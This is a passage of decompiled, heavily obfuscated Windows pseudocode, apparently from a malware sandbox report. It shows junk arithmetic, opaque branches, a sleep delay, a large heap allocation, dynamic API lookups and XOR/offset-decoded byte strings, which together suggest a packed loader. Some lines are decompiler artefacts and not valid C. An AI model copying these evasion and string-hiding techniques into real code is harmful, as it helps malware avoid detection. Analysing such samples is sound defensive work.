								 *(_t2587 - 1) =  *0x1000cd0;
								 *(_t2587 - 0x5c) = ( *(_t2587 - 8) & 0x000000ff) + ( *(_t2587 - 8) & 0x000000ff) * 4 << 4;
								 *(_t2587 - 5) =  *(_t2587 - 0x4c) & 0x000000ea;
							}
						}
					} else {
						__eflags =  !( *(_t2587 - 0x6c));
						if( !( *(_t2587 - 0x6c)) != 0) {
							goto L368;
						} else {
							( *(_t2587 - 8) & 0xff) - ( !( *(_t2587 - 0xb) & 0x000000ff) |  *(_t2587 - 3) & 0xff) =  !(( *(_t2587 - 8) & 0xff) - ( !( *(_t2587 - 0xb) & 0x000000ff) |  *(_t2587 - 3) & 0xff) < 0);
							if( !(( *(_t2587 - 8) & 0xff) - ( !( *(_t2587 - 0xb) & 0x000000ff) |  *(_t2587 - 3) & 0xff) < 0) != 0) {
								_t1778 =  *0x1000c9e; // 0x0
								 *(_t2587 - 0xd) = _t1778 - 0x5b;
							}
						}
					}
					_t2216 = _t2587 - 0x148;
					_t1130 = _t2587 - 0x190;
					goto L378;
				} else {
					_t2245 =  *0x1000cdc; // 0x84521e70
					 *0x1000cb4 = _t2245 + 0xca6a8024;
					_t2248 = _t1090 * 0x7c >> 0x20;
					 *0x1000c9f = _t1090 * 0x7c;
					asm("cdq");
					asm("adc edx, edi");
					 *(_t2587 - 0x38) = E00ECEE50(( *(_t2587 - 8) & 0x000000ff) +  *(_t2587 - 0x38), _t2248,  *(_t2587 - 0x38),  *(_t2587 - 0x34));
					 *(_t2587 - 0x34) = _t2248;
					_t1814 =  *0x1000ce8; // 0x4
					 *(_t2587 - 0x48) =  *(_t2587 - 0x40) ^ 0xe39f933a;
					 *(_t2587 - 0x44) =  *(_t2587 - 0x3c) ^ 0x0001ddff;
					 *(_t2587 - 0xa) = _t1814 >> 7;
					 *(_t2587 - 0x20) =  *0x1215420;
					 *0x1000d10 = 0x1a;
					 *0x1000d14 = _t1637;
					 *(_t2587 - 4) = (( *(_t2587 - 4) & 0x000000ff) - ( *(_t2587 - 0x18) & 0x0000ffff)) * ( *(_t2587 - 4) & 0x000000ff);
					 *0x1000cd4 =  *0x1000cd4 +  *(_t2587 - 0x2c) * 0xff8d;
					 *(_t2587 - 0x28) =  *(_t2587 - 0x28) *  *0x1000cb4;
					 *(_t2587 - 0x68) =  *0x1215420;
					 *(_t2587 - 0x64) = _t1637;
					_t2255 =  *0x1000d10; // 0x0
					 *(_t2587 - 0xb8) =  *(_t2587 - 0x20) + 0x2ce;
					GetProcAddress(_t2255, "GetLastError");
					 *(_t2587 - 0xb4) =  *(_t2587 - 0x20) + 0x11e;
					asm("cdq");
					 *(_t2587 - 0x48) =  *0x1000c9e;
					 *(_t2587 - 0x44) = _t2255;
					 *(_t2587 - 9) = ( *(_t2587 - 9) & 0x000000ff) + ( *(_t2587 - 2) & 0x000000ff);
					 *0x1000c9f = 0xc8;
					 *(_t2587 - 3) =  *0x1215420 & 0x000000ff;
					 *(_t2587 - 0xac) =  *(_t2587 - 0x20) + 0x30d;
					if( *(_t2587 - 0xac) *  *(_t2587 - 0xb4) == 0xfffffff8) {
						L379:
						__eflags = 0;
						return 0;
					} else {
						_t2655 =  *0x1000c9c - _t1637; // 0xd4
						if(_t2655 != 0) {
							 *0x1000c83 = 3;
							_t1505 =  *0x1000c83 & 0x000000ff;
							 *(_t2587 - 0x88) =  *(_t2587 - 0x6c);
							if(_t1505 <= 3) {
								switch( *((intOrPtr*)(_t1505 * 4 +  &M00EC78AC))) {
									case 0:
										 *0x1000d18 = _t1637;
										 *0x1000d1c = _t1637;
										 *(_t2587 - 0x6c) = ( *(_t2587 - 0xb) & 0x000000ff ^  *(_t2587 - 0x58)) + ( *0x1000c9b & 0x000000ff) -  *(_t2587 - 0x30);
										 *(_t2587 - 0xd) = ( *(_t2587 - 3) & 0x000000ff) + 0xd0;
										goto L117;
									case 1:
										__ecx =  *(__ebp - 0x60) & 0x0000ffff;
										__edx =  *0x1000c9c; // 0x250000d4
										__ecx = ( *(__ebp - 0x60) & 0x0000ffff) - __edx;
										 *(__ebp - 0x60) = __cx;
										goto L117;
									case 2:
										 *0x1000d10 = 0xbe;
										 *0x1000d14 = __ebx;
										goto L117;
									case 3:
										__eax =  *0x112f775;
										asm("cdq");
										 *0x1000cc8 =  *0x112f775;
										__eax =  *(__ebp - 7) & 0x000000ff;
										__ecx =  *0x1000d08; // 0xd72e
										 *0x1000ccc = __edx;
										_t428 = __ecx - 0x632d50be; // -1663913950
										__edx = ( *(__ebp - 7) & 0x000000ff) + _t428;
										 *(__ebp - 7) = __dl;
										__eax =  *(__ebp - 3) & 0x000000ff;
										__ecx =  *0x1000c9a;
										__edx =  *(__ebp - 3) & 0x000000ff;
										__eax = ( *(__ebp - 3) & 0x000000ff) *  *0x1000c9a;
										__edx =  *(__ebp - 3) & 0x000000ff | ( *(__ebp - 3) & 0x000000ff) *  *0x1000c9a;
										 *(__ebp - 3) = __dl;
										__eax =  *(__ebp - 0xa0);
										__ecx =  *(__ebp - 0x9c);
										__eax =  *(__ebp - 0xa0) - 0x13;
										__eflags = __eax;
										 *0x1000cdc = __eax;
										goto L117;
								}
							}
						}
						L117:
						Sleep(0xfa); // executed
						_t1224 = RtlAllocateHeap(_t2549, 8, 0x12e3a0); // executed
						_t2259 =  *(_t2587 - 7);
						 *0x10bbe8c = _t1224;
						if(_t2259 >  *0x1000cdc) {
							__eflags =  *(_t2587 - 0x60);
							if(__eflags != 0) {
								asm("cdq");
								asm("adc edx, esi");
								asm("adc edx, esi");
								_t1495 =  *(_t2587 - 0x60) +  *(_t2587 - 0x88) +  *(_t2587 - 0x68) | _t2259;
								__eflags = _t1495;
								if(_t1495 != 0) {
									_t2006 = 0;
									__eflags = 0;
								} else {
									_t2006 = _t1495 + 1;
								}
								__eflags =  *0x1000cd0; // 0x0
								asm("cdq");
								asm("cdq");
								asm("sbb edi, edx");
								asm("adc esi, edi");
								_t2008 = _t2006 + (0 | __eflags == 0x00000000) - 0x38 -  !( *0x1000cec & 0x0000ffff) -  *(_t2587 - 0x48);
								asm("sbb esi, eax");
								__eflags = M01000CB0;
								 *0x1000cc0 =  !_t2008;
								 *0x1000cc4 =  !0x00000000;
								if(M01000CB0 != 0) {
									_t1502 = 0;
									__eflags = 0;
									 *(_t2587 - 0xbc) = 0;
								} else {
									_t1502 = 1;
									 *(_t2587 - 0xbc) = 0;
								}
								_t2433 =  *0x1000c84; // 0x52f68420
								_t2010 =  *0x1000cb4; // 0x51
								 *0x1000c9e = _t2010 - (_t1502 |  *0x1000d10);
								 *0x1000d08 = ( *(_t2587 - 0x18) ^ 0x00000082) * ( !(_t2433 *  *0x1000d00) & 0x0000ffff);
								_t1637 = 0;
								__eflags = 0;
							}
						} else {
							 *0x1000ca0 =  *(_t2587 - 0x1c) + 0x30;
						}
						_t1824 =  *(_t2587 - 0xc4);
						if( *(_t2587 - 0xc4) * 0xfffc7d5b == ( *(_t2587 - 0xa8) |  *(_t2587 - 0xc4) | 0x0000023d)) {
							goto L379;
						} else {
							_t2659 =  *(_t2587 - 0x68) |  *(_t2587 - 0x64);
							if(( *(_t2587 - 0x68) |  *(_t2587 - 0x64)) != 0) {
							}
							_t1232 = E00EC8E37(_t1824, _t2659, 0x64, 0x2d); // executed
							 *(_t2587 - 0x78) = _t1232;
							 *(_t2587 - 0x74) = _t1637;
							_t1233 =  *(_t2587 - 0x78);
							if( *(_t2587 - 0x74) > _t1637 || _t1233 > _t1637) {
								_t1825 = 1;
							} else {
								_t1825 = 0;
								__eflags = 0;
							}
							_t1234 =  *(_t2587 - 0x78);
							if( *(_t2587 - 0x74) > _t1637 || _t1234 > 0x56) {
								_t1235 = 1;
							} else {
								_t1235 = 0;
								__eflags = 0;
							}
							if(_t1825 != _t1235) {
								__eflags =  *(_t2587 - 0x28);
								if( *(_t2587 - 0x28) == 0) {
									L146:
									__eflags =  *0x1000cd2;
									if(__eflags == 0) {
										__eflags =  *(_t2587 - 0x24);
										if(__eflags == 0) {
											_t1991 =  *0x1000d10; // 0x0
											_t1483 =  *0x1000cf8; // 0xffff
											 *(_t2587 - 0x4c) = _t1991 + 0x5f35bf84;
											_t1993 =  *0x1000cc8; // 0x1
											 *0x1000cd0 =  *0x1000cd0 + _t1993 * 0x75df;
											 *0x1000c9c =  *0x1000c9e * 0x307c;
											_t2423 = (_t1483 << 4) + _t1483;
											__eflags = _t2423;
											 *0x1000ca8 = 0xe0dd;
											 *0x1000cac = _t1637;
											 *0x1000cf8 = _t2423;
										}
									} else {
										 *(_t2587 - 3) =  *(_t2587 - 3) |  *(_t2587 - 3) +  *0x1000ce0;
										 *0x1000ca4 =  ~( *(_t2587 - 5) & 0xff);
										_t1997 =  *0x1000cd4; // 0x0
										 *0x1000c9b = ( *(_t2587 - 9) & 0x000000ff) - 0x27;
										 *(_t2587 - 3) = ( *(_t2587 - 3) & 0x000000ff) - _t1997;
										 *0x1000c9e =  *0x1215420 & 0x000000ff;
									}
								} else {
									__eflags =  *(_t2587 - 7);
									if(__eflags == 0) {
										goto L146;
									} else {
										_t2427 =  *0x1000c90; // 0xffff571c
										 *0x1000c94 = _t2427;
									}
								}
							} else {
								_t2665 =  *0x1000d20 -  *0x1000c9a; // 0x530e
								if(_t2665 == 0) {
									__eflags =  *(_t2587 - 4) -  *(_t2587 - 0x24);
									if(__eflags != 0) {
										_t2001 =  *0x1000d00; // 0xfffff835
										_t2429 =  *0x1000d04; // 0xffffffff
										asm("adc edx, ebx");
										M01000CB0 = 0x396ae7eb;
										 *(_t2587 - 0xc) = 0x3e;
										 *0x1000cc8 = _t2001 + 0x1afd0521;
										 *0x1000ccc = _t2429;
									}
								} else {
									 *0x1000ca4 = ( *0x1000c9b & 0x000000ff) - 0x313bc7a3;
									 *(_t2587 - 4) =  *0x1215420;
								}
							}
							if( *0x10bbe8c == _t1637) {
								 *(_t2587 - 0xc) = E00EC1370(__eflags);
								__eflags =  *(_t2587 - 0xc);
								if( *(_t2587 - 0xc) > 0) {
									 *0x1000cf8 = 0x8d03;
								}
								_t2263 =  *0x1215420;
								 *(_t2587 - 0x20) = _t2263;
								__eflags =  *0x1000c9b;
								 *(_t2587 - 0xb4) =  *(_t2587 - 0x20) + 0x276;
								if( *0x1000c9b != 0) {
									L176:
									__eflags =  *(_t2587 - 0xc) -  *(_t2587 - 5);
									if( *(_t2587 - 0xc) <=  *(_t2587 - 5)) {
										_t1827 = 0;
										__eflags = 0;
									} else {
										_t1827 = 1;
									}
									asm("cdq");
									asm("adc edx, [0x1000d14]");
									__eflags = ( *0x1000c98 & 0x0000ffff) +  *0x1000d10 - _t1827;
									if(( *0x1000c98 & 0x0000ffff) +  *0x1000d10 != _t1827) {
										L182:
										_t1245 = 0;
										__eflags = 0;
									} else {
										__eflags = _t2263;
										if(_t2263 != 0) {
											goto L182;
										} else {
											_t1245 = 1;
										}
									}
									__eflags =  *0x1000cf8 - _t1637;
									 *(_t2587 - 0xa8) = _t1637;
									_t1829 = 0 |  *0x1000cf8 == _t1637;
									__eflags = _t1829 -  *(_t2587 - 0x28);
									asm("sbb ecx, ecx");
									( *(_t2587 - 3) & 0x000000ff) - _t1829 + 1 = _t1245 - ( *(_t2587 - 3) & 0x000000ff) - _t1829 + 1 < 0;
									_t1637 =  *(_t2587 - 0xa8);
									if(_t1245 != ( *(_t2587 - 3) & 0x000000ff) - _t1829 + 1 < 0) {
										__eflags =  *(_t2587 - 0x8c);
										_t2269 =  *(_t2587 - 0x8c) - (0 |  *(_t2587 - 0x8c) == 0x00000000);
										__eflags = _t2269;
										if(_t2269 != 0) {
											 *0x1000ca0 =  *0x1215420;
											asm("cdq");
											 *0x1000cbc = _t2269;
											_t2269 =  *0x1000ce8;
											_t1970 = ( *(_t2587 - 0xe) & 0x000000ff) * _t2269;
											__eflags = _t1970;
											 *0x1000cb8 =  *0x1000c9a - 0x20f4;
											 *(_t2587 - 0xe) = _t1970;
										}
									} else {
										 *(_t2587 - 0x18) =  *0x1000ca4 - ( *(_t2587 - 0xb) & 0xff);
										asm("cdq");
										 *0x1000cf0 =  *0x1000cf0 - ( *(_t2587 - 9) & 0x000000ff);
										asm("sbb [0x1000cf4], edx");
										_t2269 =  *(_t2587 - 0x64);
										 *0x1000c94 =  *(_t2587 - 0x68) + 0xbfc4;
										 *(_t2587 - 0x6c) = ( *(_t2587 - 0xa) & 0xff) * 0x9564;
									}
								} else {
									__eflags = ( *0x1000c83 & 0x000000ff) -  *(_t2587 - 0x90);
									if(( *0x1000c83 & 0x000000ff) >  *(_t2587 - 0x90)) {
										goto L176;
									} else {
										 *(_t2587 - 0x28) =  *0x1000cd2 + 0xd71b;
										 *(_t2587 - 0x24) =  *(_t2587 - 0x24) - 1;
										 *(_t2587 - 0xb) = ( *(_t2587 - 0xb) & 0x000000ff) +  *0x1000c9e - ( *(_t2587 - 0xb) & 0xff);
										_t2269 = ( *(_t2587 - 5) & 0x000000ff) + ( *(_t2587 - 5) & 0x000000ff &  *0x1000cd8);
										 *(_t2587 - 5) = _t2269;
									}
								}
								 *(_t2587 - 0xac) =  *(_t2587 - 0x20) + 0x2e4;
								_t1250 =  *(_t2587 - 1);
								asm("cdq");
								__eflags = _t1250 -  *0x1000d10; // 0x0
								if(__eflags != 0) {
									L189:
									_t1251 = 1;
								} else {
									__eflags = _t2269 -  *0x1000d14; // 0x0
									if(__eflags == 0) {
										_t1251 = 0;
										__eflags = 0;
									} else {
										goto L189;
									}
								}
								_t2270 =  *(_t2587 - 1);
								_t2270 - 0x30 = _t1251 - (_t2270 != 0x30);
								if(_t1251 > (_t2270 != 0x30)) {
									asm("cdq");
									asm("sbb esi, edx");
									asm("cdq");
									__eflags =  *0x1000d10 - ( *(_t2587 - 0x18) & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t2270;
									if(( *0x1000d10 - ( *(_t2587 - 0x18) & 0x0000ffff) |  *0x1000c84 |  *0x1000d14 | _t2270) != 0) {
										 *(_t2587 - 0x1c) =  *(_t2587 - 0x38) *  *(_t2587 - 0x1c);
										 *(_t2587 - 0x28) = 0x3090bb2d;
										_t2399 =  *(_t2587 - 1) + 0x23;
										__eflags = _t2399;
										 *0x1000c9a = _t2399;
										 *(_t2587 - 0x40) = E00ECEE50( *(_t2587 - 0x38),  *(_t2587 - 0x34), 0x7d, _t1637);
										 *(_t2587 - 0x3c) = _t2399;
									}
								} else {
									 *0x1000c9f = TlsGetValue( *(_t2587 - 0x60));
								}
								 *(_t2587 - 0xb8) =  *(_t2587 - 0x20) + 0x2bc;
								 *(_t2587 - 0x20) =  *0x1215420;
								 *0x1000cd0 = 0xfffff41d;
								 *0x1000cd8 = (1 -  *0x1000d18) *  *0x1000cd8;
								_t1256 =  *0x1000cb8; // 0x4
								 *0x1000c94 =  *(_t2587 - 0x38) * 0xdcf2d26f;
								 *(_t2587 - 0x90) = _t1256 & 0x00000006;
								 *(_t2587 - 0x14) =  *(_t2587 - 0x20) + 0x3b1;
								__eflags =  *(_t2587 - 0x7c);
								if( *(_t2587 - 0x7c) == 0) {
									__eflags =  *0x1000ca8 |  *0x1000cac;
									if(( *0x1000ca8 |  *0x1000cac) != 0) {
										__eflags =  !( *0x1000d10) |  !( *0x1000d14);
										if(( !( *0x1000d10) |  !( *0x1000d14)) != 0) {
											 *0x1000ca4 =  *0x1000ca4 - 1;
											asm("adc ecx, [0x1000cbc]");
											 *(_t2587 - 0x38) =  *(_t2587 - 0x38) +  *0x1000cb8 + 0xd0056b0c;
											asm("adc ecx, 0xfff005d1");
											asm("adc eax, 0xfff765fd");
											 *0x1000ce4 =  *0x1000d04;
											 *0x1000ce0 =  *0x1000d00 + 0x1e29880a;
											asm("cdq");
											 *(_t2587 - 0x38) =  *(_t2587 - 0x38) -  *(_t2587 - 1) + 0x10;
											asm("sbb [ebp-0x34], edx");
											_t1954 = ( *(_t2587 - 0xa0) +  *(_t2587 - 0x18) + 2) * 0x6a +  *0x1000c98 * 0x41;
											__eflags = _t1954;
											 *0x1000c83 = _t1954;
										}
									} else {
										 *0x1000ca4 = ( *(_t2587 - 0x68) +  *0x1000ca4) *  *0x1000ca4;
										 *(_t2587 - 0x30) =  *(_t2587 - 0x30) -  *(_t2587 - 0x40);
										 *(_t2587 - 0x24) =  *0x1000c84 + 0x6491;
									}
								} else {
									__eflags =  *(_t2587 - 0x6c);
									if( *(_t2587 - 0x6c) != 0) {
										_t1430 =  *0x1000ce0; // 0x0
										_t1957 =  *0x1000ce4; // 0x0
										__eflags = _t1430 ^  *0x1000d18 | _t1957 ^  *0x1000d1c;
										if(__eflags == 0) {
											 *0x1000c84 = 0x78;
											 *0x1000cc8 =  *0x1000ca8 & 0x430b161a;
											 *0x1000ccc = _t1637;
											 *(_t2587 - 3) =  *0x1215420;
											 *(_t2587 - 0x70) =  *0x1000cb4 << 4;
										} else {
											 *0x1000c88 =  *0x1000c9f + 0x60ad17c2 ^  *0x1000c94;
											_t1966 =  *0x1000c9c; // -44
											 *0x1000c8c = _t1637;
											 *(_t2587 - 4) =  *(_t2587 - 0xd) & 0xffffff00 | __eflags == 0x00000000;
											 *(_t2587 - 0x4c) = ( *0x1000c98 & 0x0000ffff) + 0x73bfbdfe;
											 *0x113d808 = _t1966;
										}
									}
								}
								 *(_t2587 - 0xa4) =  *(_t2587 - 0x20) + 0x241;
								 *(_t2587 - 0xc4) =  *(_t2587 - 0x20) + 0x273;
								 *(_t2587 - 0x20) =  *0x1215420;
								 *(_t2587 - 6) = E00EC1000();
								__eflags = 0x4f - ( *(_t2587 - 6) & 0x000000ff);
								_t2282 =  *(_t2587 - 6) & 0x000000ff;
								asm("sbb ecx, ecx");
								__eflags = 0 - _t2282;
								asm("sbb edx, edx");
								__eflags = _t2282 + 1 -  *(_t2587 - 4) + 1;
								if(_t2282 + 1 >  *(_t2587 - 4) + 1) {
									asm("cdq");
									 *0x1000ce0 =  *0x1000ce0;
									asm("sbb [0x1000ce4], edx");
									 *(_t2587 - 0x18) =  *(_t2587 - 0x70) - 0x23c803e3;
									 *(_t2587 - 0x28) =  *0x1215420;
									 *0x1000cd2 = 0 - ( *(_t2587 - 0xa0) ^ 0);
									_t1949 = ( *(_t2587 - 8) & 0xff) +  *(_t2587 - 0x6c) + 1;
									__eflags = _t1949;
									 *0x1000cd8 = _t1949;
								}
								 *(_t2587 - 0xa8) =  *(_t2587 - 0x20) + 0x83;
								__eflags =  *(_t2587 - 0xa0) |  *(_t2587 - 0x9c);
								if(__eflags == 0) {
									asm("sbb eax, eax");
									asm("cdq");
									_t2285 =  *(_t2587 - 0x30) & 0x0000ffff;
									asm("cdq");
									asm("sbb edx, ebx");
									 *0x1000d18 = E00ECEE50(( ~( *(_t2587 - 0x28)) + 1) * ( *(_t2587 - 0x1c) & 0x0000ffff),  *(_t2587 - 0x1c) & 0x0000ffff, _t2285 -  *(_t2587 - 0x48), _t2285);
									 *0x1000d1c = _t2285;
									 *0x1000cd8 = ( *0x1000c9b & 0x000000ff) - 0x23e5;
									_t1637 = 0;
									__eflags = 0;
								} else {
									 *(_t2587 - 0x4c) = E00EC1370(__eflags) & 0x000000ff;
									_t2369 =  *(_t2587 - 0x4c);
									__eflags = _t2369;
									if(_t2369 <= 0) {
										_t1397 =  *0x1000cac; // 0x106b42
										__eflags = _t1397 -  *0x1000c8c; // 0xfff500a5
										if(__eflags > 0) {
											L212:
											_t1399 =  *(_t2587 - 0xa) & 0x000000ff;
											asm("cdq");
											__eflags = _t2369 -  *0x1000d14;
											if(__eflags < 0) {
												L216:
												_t1400 = 0;
												__eflags = 0;
											} else {
												if(__eflags > 0) {
													L215:
													_t1400 = 1;
												} else {
													__eflags = _t1399 -  *0x1000d10;
													if(_t1399 <=  *0x1000d10) {
														goto L216;
													} else {
														goto L215;
													}
												}
											}
											 *(_t2587 - 8) =  *0x1000c90 - ( *(_t2587 - 8) == 0);
											__eflags = _t1400 - ( *0x1000c90 ==  *(_t2587 - 8) == 0);
											if(_t1400 <= ( *0x1000c90 ==  *(_t2587 - 8) == 0)) {
												_t2372 =  *0x1215420;
												 *(_t2587 - 0x80) = _t2372;
												asm("cdq");
												asm("cdq");
												_t1406 = E00ECEE50(E00ECEE50( *(_t2587 - 0x24), _t2372, ( *0x1000cd4 & 0x0000ffff) + 0x43, _t2372), _t2372,  *0x1000d18,  *0x1000d1c);
												 *0x1000ce4 = _t2372;
												 *0x1000ce0 = _t1406;
												 *(_t2587 - 0x88) = (( *(_t2587 - 3) & 0x000000ff) - ( *(_t2587 - 6) & 0x000000ff)) *  *0x1000d18;
												 *(_t2587 - 0x2c) = ( *(_t2587 - 0x84) & 0x0000ffff) - 0x86;
											}
										} else {
											if(__eflags < 0) {
												L211:
												 *(_t2587 - 2) =  *(_t2587 - 0x80) - 0x6b;
											} else {
												_t1942 =  *0x1000ca8; // 0x7b8b5249
												__eflags = _t1942 -  *0x1000c88; // 0xa666078f
												if(__eflags > 0) {
													goto L212;
												} else {
													goto L211;
												}
											}
										}
									}
								}
								_t2287 =  *(_t2587 - 0x20) + 0x373;
								 *(_t2587 - 0xb8) = _t2287;
								_t2565 =  *(_t2587 - 0x58);
								_t1281 =  *(_t2587 - 0x30);
								asm("cdq");
								__eflags = _t2287 -  *(_t2587 - 0x54);
								if(__eflags > 0) {
									L224:
									_t1282 = 0;
									__eflags = 0;
								} else {
									if(__eflags < 0) {
										L223:
										_t1282 = 1;
									} else {
										__eflags = _t1281 - _t2565;
										if(_t1281 > _t2565) {
											goto L224;
										} else {
											goto L223;
										}
									}
								}
								__eflags =  *(_t2587 - 0x30) - 0x54;
								_t2289 = 0 |  *(_t2587 - 0x30) - 0x00000054 <= 0x00000000;
								__eflags = _t1282 - _t2289;
								if(_t1282 < _t2289) {
									 *(_t2587 - 9) =  *0x1000cd0;
									 *0x1000ca4 =  *0x1000cb4;
								} else {
									asm("cdq");
									 *(_t2587 - 0x48) =  *(_t2587 - 0x48) - E00ECEE50( *(_t2587 - 0x48),  *(_t2587 - 0x44),  *0x1000c9c, _t2289);
									asm("sbb [ebp-0x44], edx");
									 *(_t2587 - 0xc) = 0x53;
									_t2368 =  *(_t2587 - 0x24);
									_t1395 = _t2368 - 0xff34;
									__eflags = _t1395;
									asm("cdq");
									 *0x1000cc0 = _t1395;
									asm("ror byte [eax+eax], 0x1");
									 *0x1000cc4 = _t2368;
								}
								_t2291 =  *(_t2587 - 0x20) + 0x117;
								 *(_t2587 - 0xb8) = _t2291;
								 *0x1000ca4 = E00EC1700();
								asm("cdq");
								asm("adc edx, 0xcae43");
								__eflags =  !( *0x1000c9f) + 0x0dc8da25 | _t2291;
								if(( !( *0x1000c9f) + 0x0dc8da25 | _t2291) != 0) {
								}
								__eflags =  *(_t2587 - 0xa8) - 0x3b0;
								if( *(_t2587 - 0xa8) != 0x3b0) {
									 *(_t2587 - 0x6c) =  *(_t2587 - 0x6c) &  *0x1109ef0;
									 *(_t2587 - 0x88) =  *(_t2587 - 0x88) -  *(_t2587 - 0x78) &  *(_t2587 - 0x88);
									 *((char*)(_t2587 - 0xfc)) = 0x97;
									 *((char*)(_t2587 - 0xfb)) = 0xaf;
									 *((char*)(_t2587 - 0xfa)) = 0xb7;
									 *((char*)(_t2587 - 0xf9)) = 0xb9;
									 *((char*)(_t2587 - 0xf8)) = 0xbc;
									 *((char*)(_t2587 - 0xf7)) = 0xc3;
									 *((char*)(_t2587 - 0xf6)) = 0x6a;
									 *((char*)(_t2587 - 0xf5)) = 0xb0;
									 *((char*)(_t2587 - 0xf4)) = 0xab;
									 *((char*)(_t2587 - 0xf3)) = 0xbf;
									 *((char*)(_t2587 - 0xf2)) = 0xb6;
									 *((char*)(_t2587 - 0xf1)) = 0xbe;
									_t2566 = 0;
									do {
										_t1859 =  *0x1000cc0; // 0xffff970a
										__eflags = _t1859 |  *0x1000cc4;
										if((_t1859 |  *0x1000cc4) == 0) {
											_t2296 =  *(_t2587 - 7);
											_t1292 = _t2296;
											asm("cdq");
											__eflags =  *0x1000cbc - _t2296;
											if(__eflags < 0) {
												L241:
												_t1293 = 0;
												__eflags = 0;
											} else {
												if(__eflags > 0) {
													L240:
													_t1293 = 1;
												} else {
													__eflags =  *0x1000cb8 - _t1292;
													if( *0x1000cb8 <= _t1292) {
														goto L241;
													} else {
														goto L240;
													}
												}
											}
											__eflags =  !_t1293;
											if( !_t1293 == 0) {
												__eflags =  *0x1000ce0 |  *0x1000ce4;
												if(( *0x1000ce0 |  *0x1000ce4) != 0) {
													_t2365 =  *(_t2587 - 0x70) &  *0x1000ce0;
													 *0x1000ce0 = E00ECEE50(_t2365, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
													 *0x1000ce4 = _t2365;
													 *0x1000cd8 =  *(_t2587 - 0x40) * 0xffffe4ed;
													_t1391 =  *0x1000d20 & 0xffffb755;
													__eflags = _t1391;
													 *(_t2587 - 0x5c) = _t1391;
												}
											} else {
												 *0x1000c84 =  *0x1000c84 + 1;
											}
										} else {
											 *0x1000c84 = 0x9b;
											 *(_t2587 - 8) = 1;
										}
										_t2297 =  *0x1000d08;
										_t1863 =  *0x1000cf4; // 0x2b91c
										asm("cdq");
										_t2298 =  *0x1000cf0; // 0xd43579fe
										 *(_t2587 - 0xa8) = _t2297;
										_t1301 = E00ECEE50(_t2298, _t1863, 0x1faed387, _t1637);
										asm("sbb edx, edi");
										_t1637 = 0;
										__eflags = _t1301 -  !( *(_t2587 - 2) ^ _t2297) | _t2298;
										 *0x1000cf4 = 0;
										 *0x1000cf0 = 1;
										if((_t1301 -  !( *(_t2587 - 2) ^ _t2297) | _t2298) != 0) {
											 *0x1000cf0 = 0;
										}
										_t1865 =  *0x1000ca4; // 0x9b27
										 *0x1000c90 = 0xb8f675f1 - ( *(_t2587 - 1) & 0x000000ff);
										_t2301 =  *0x1000cdc; // 0x84521e70
										__eflags =  *(_t2587 - 0x24) & 0x0000ffff;
										_t2566 = _t2566 + 1;
										 *0x1000d10 = ( *(_t2587 - 1) & 0x000000ff) *  *(_t2587 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t2587 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t1865 + _t2301));
										__eflags = _t2566 - 0xc;
										 *(_t2587 + _t2566 * 2 - 0x1ae) = ( *(_t2587 + _t2566 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
										 *0x1000d14 = _t1637;
									} while (_t2566 < 0xc);
									_t2309 = 0x92 - ( *(_t2587 - 0xac) ^  *(_t2587 - 0xb4));
									_t1313 = M01000CB0; // 0x0
									 *(_t2587 - 0x194) = _t2309;
									 *0x1000cc0 = 2;
									 *0x1000cc4 = _t1637;
									_t1314 = E00ECEE50(_t1313, _t1637, 0xbe790e28, 0x61b36);
									 *0x1000d1c = _t2309;
									 *0x1000d18 = _t1314;
									_t1316 =  *0x1000cc0; // 0xffff970a
									_t1878 =  *0x1000cc4; // 0xffffffff
									 *0x1000c94 =  *(_t2587 - 0x1c) +  *(_t2587 - 1) + 1;
									_t2313 = _t1316 | _t1878;
									__eflags = _t2313;
									if(_t2313 == 0) {
										_t2315 = 1 -  *(_t2587 - 0x78);
										asm("sbb eax, ecx");
										_t1319 = E00ECEE50(_t2315, 0,  *0x1000ca8,  *0x1000cac);
										 *0x1000cac = _t2315;
										_t2313 =  *0x1000c83 & 0x000000ff;
										M01000CB0 = M01000CB0 ^ _t2313;
										__eflags = M01000CB0;
										 *0x1000ca8 = _t1319;
									} else {
										__eflags = _t1316 - 1;
										if(_t1316 != 1) {
											L252:
											__eflags = _t1316 - 2;
											if(_t1316 == 2) {
												__eflags = _t1878 - _t1637;
												if(_t1878 == _t1637) {
													 *(_t2587 - 0xbc) = _t1637;
													__eflags =  *(_t2587 - 0x24);
													if( *(_t2587 - 0x24) != 0) {
														_t1920 = 0;
														__eflags = 0;
													} else {
														_t1920 = 1;
													}
													 *(_t2587 - 0xbc) = _t1637;
													__eflags =  *(_t2587 - 0xb);
													if( *(_t2587 - 0xb) != 0) {
														_t1381 = 0;
														__eflags = 0;
													} else {
														_t1381 = 1;
													}
													 *(_t2587 - 0x18) = ( *(_t2587 - 0x78) - _t1920) *  *0x1000d10 * _t1381;
													asm("cdq");
													asm("sbb esi, edx");
													_t2313 =  *(_t2587 - 0x48);
													asm("sbb esi, eax");
													 *(_t2587 - 0x48) =  *(_t2587 - 0x48) -  *(_t2587 - 7) - _t2313;
												}
											}
										} else {
											__eflags = _t1878 - _t1637;
											if(_t1878 == _t1637) {
												 *0x1000d18 =  *0x1215420;
												 *0x1000d1c = _t1637;
												 *(_t2587 - 2) =  *(_t2587 - 2) & 0x000000ff &  *(_t2587 - 0x80) & 0x0000ffff |  *(_t2587 - 2) & 0x000000ff;
												_t2313 =  *0x10ae26c;
												 *0x1000d20 =  *0x1000d20 | _t2313;
											} else {
												goto L252;
											}
										}
									}
									 *((char*)(_t2587 - 0xdc)) = 0xe5;
									 *((char*)(_t2587 - 0xdb)) = 0xdd;
									 *((char*)(_t2587 - 0xda)) = 0xe5;
									 *((char*)(_t2587 - 0xd9)) = 0xe7;
									 *((char*)(_t2587 - 0xd8)) = 0xea;
									 *((char*)(_t2587 - 0xd7)) = 0xf1;
									_t1322 = E00EC1190() & 0x000000ff;
									__eflags = _t1322 - _t1637;
									 *0x1000cd8 = _t1322;
									if(_t1322 > _t1637) {
										asm("cdq");
										 *0x1000d1c = _t1637;
										asm("adc edx, [0x1000cbc]");
										 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
										 *0x1000cc4 =  !_t2313;
										 *0x1000d18 =  *0x1215420;
